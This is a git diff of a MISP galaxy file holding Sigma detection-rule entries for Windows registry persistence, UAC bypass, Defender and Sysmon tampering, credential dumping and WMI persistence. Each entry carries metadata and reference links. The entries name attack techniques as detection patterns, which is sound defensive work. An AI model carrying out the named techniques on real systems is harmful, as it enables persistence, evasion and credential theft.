"logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "value": "New RUN Key Pointing to Suspicious Folder" + }, + { + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." + ], + "filename": "registry_set_susp_service_installed.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" + ], + "tags": [ + "attack.t1562.001", + "attack.defense_evasion" + ] + }, + "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", + "value": "Suspicious Service Installed" + }, + { + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "meta": { + "author": "frack113", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_susp_user_shell_folders.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" + ] + }, + "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "value": "Modify User Shell Folders Startup Value" + }, + { + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "meta": { + "author": "Syed Hasan (@syedhasan009)", + "creation_date": "2021/06/18", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_taskcache_entry.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://labs.f-secure.com/blog/scheduled-task-tampering/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ] + }, + "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "value": "Scheduled TaskCache Change by Uncommon Program" + }, + { + "description": "Detects persistence method using windows telemetry", + "meta": { + "author": "Lednyov Alexey, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_telemetry_persistence.yml", + "level": "critical", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "value": "Registry Persistence Mechanism via Windows Telemetry" + }, + { + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "meta": { + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "creation_date": "2022/09/29", + "falsepositive": [ + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + ], + "filename": "registry_set_terminal_server_suspicious.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "value": "RDP Sensitive Settings Changed to Zero" + }, + { + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "meta": { + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "creation_date": "2022/08/06", + "falsepositive": [ + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + ], + "filename": "registry_set_terminal_server_tampering.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "value": "RDP Sensitive Settings Changed" + }, + { + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/06/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_timeproviders_dllname.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" + ] + }, + "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "value": "Set TimeProviders DllName" + }, + { + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "meta": { + "author": "frack113", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate use" + ], + "filename": "registry_set_treatas_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "value": "COM Hijacking via TreatAs" + }, + { + "description": "Detects UAC bypass method using Windows event viewer", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_eventvwr.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", + "value": "UAC Bypass via Event Viewer - Registry Set" + }, + { + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "meta": { + "author": "Omer Yampel, Christian Burkard", + "creation_date": "2017/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_sdclt.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", + "value": "UAC Bypass via Sdclt" + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_winsat.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "value": "UAC Bypass Abusing Winsat Path Parsing - Registry" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "value": "UAC Bypass Using Windows Media Player - Registry" + }, + { + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_vbs_payload_stored.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f", + "value": "VBScript Payload Stored in Registry" + }, + { + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_wab_dllpath_reg_change.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", + "https://twitter.com/Hexacorn/status/991447379864932352", + "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "value": "Execution DLL of Choice Using WAB.EXE" + }, + { + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_wdigest_enable_uselogoncredential.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "value": "Wdigest Enable UseLogonCredential" + }, + { + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "meta": { + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Administrator actions" + ], + "filename": "registry_set_windows_defender_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263", + "value": "Disable Windows Defender Functionalities Via Registry Keys" + }, + { + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitmate use of the multi session functionality" + ], + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "value": "Winlogon AllowMultipleTSSessions Enable" + }, + { + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_winlogon_notify_key.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "value": "Winlogon Notify Key Logon Persistence" + }, + { + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "regsitry_set_natural_language_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/naturallanguage6.html", + "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/regsitry_set_natural_language_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "value": "Add DLLPathOverride Entry For Persistence" + }, + { + "description": "Detects Accessing to lsass.exe by Powershell", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "sysmon_accessing_winapi_in_powershell_credentials_dumping.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "3f07b9d1-2082-4c56-9277-613a621983cc", + "value": "Accessing WinAPI in PowerShell for Credentials Dumping" + }, + { + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": "sysmon_config_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77", + "value": "Sysmon Configuration Change" + }, + { + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "meta": { + "author": "frack113", + "creation_date": "2021/06/04", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": "sysmon_config_modification_error.yml", + "level": "high", + "logsource.category": "sysmon_error", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "value": "Sysmon Configuration Error" + }, + { + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "meta": { + "author": "frack113", + "creation_date": "2021/06/04", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": "sysmon_config_modification_status.yml", + "level": "high", + "logsource.category": "sysmon_status", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", + "value": "Sysmon Configuration Modification" + }, + { + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "sysmon_dcom_iertutil_dll_hijack.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ] + }, + "uuid": "e554f142-5cf3-4e55-ace9-a1b59e0def65", + "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon" + }, + { + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "sysmon_file_block_exe.yml", + "level": "high", + "logsource.category": "file_block", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_exe.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "value": "Sysmon Blocked Executable" + }, + { + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "creation_date": "2022/01/25", + "falsepositive": [ + "There are no known false positives at this time" + ], + "filename": "sysmon_process_hollowing.yml", + "level": "high", + "logsource.category": "process_tampering", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.012" + ] + }, + "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "value": "Sysmon Process Hollowing Detection" + }, + { + "description": "Detects creation of WMI event subscription persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure)", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate (vetted) use of WMI event subscription in your network" + ], + "filename": "sysmon_wmi_event_subscription.yml", + "level": "medium", + "logsource.category": "wmi_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", + "value": "WMI Event Subscription" + }, + { + "description": "Detects suspicious encoded payloads in WMI Event Consumers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "sysmon_wmi_susp_encoded_scripts.yml", + "level": "high", + "logsource.category": "wmi_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", + "value": "Suspicious Encoded Scripts in a WMI Consumer" + }, + { + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro", + "creation_date": "2019/04/15", + "falsepositive": [ + "Legitimate administrative scripts" + ], + "filename": "sysmon_wmi_susp_scripting.yml", + "level": "high", + "logsource.category": "wmi_event", + "logsource.product": "windows", + "refs": [ + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", + "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ] + }, + "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "value": "Suspicious Scripting in a WMI Consumer" + } + ], + "version": 1 +} diff --git a/galaxies/sigma-rules.json b/galaxies/sigma-rules.json index 2733e81..f2334b9 100644 --- a/galaxies/sigma-rules.json +++ b/galaxies/sigma-rules.json @@ -6,4 +6,4 @@ "type": "sigma-rules", "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", "version": 1 -} \ No newline at end of file +} From 187701bacb7eb2ecf57fae96a2df4a16385de6b3 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Fri, 6 Jan 2023 15:36:33 +0100 Subject: [PATCH 06/13] chg: [sigma] regenerated from the test script (also updated the script to ensure UUID consistency for the galaxy) --- clusters/sigma-rules.json | 116008 ++++++++++++++++++----------------- 1 file changed, 59124 insertions(+), 56884 deletions(-) diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json index 39ca38c..ffc3f22 100644 --- a/clusters/sigma-rules.json +++ b/clusters/sigma-rules.json @@ -10,10255 +10,28 @@ "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", "values": [ { - "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_exploiting.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", - "value": "Antivirus Exploitation Framework Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/16", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_hacktool.yml", - "level": "high", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ] - }, - "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", - "value": "Antivirus Hacktool Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a password dumper", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_password_dumper.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558", - "attack.t1003.001", - "attack.t1003.002" - ] - }, - "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", - "value": "Antivirus Password Dumper Detection" - }, - { - "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", - "meta": { - "author": "Sittikorn S, Nuttakorn T, Tim Shelton", - "creation_date": "2021/07/01", - "falsepositive": [ - "Unlikely, or pending PSP analysis" - ], - "filename": "av_printernightmare_cve_2021_34527.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/mvelazco/status/1410291741241102338", - 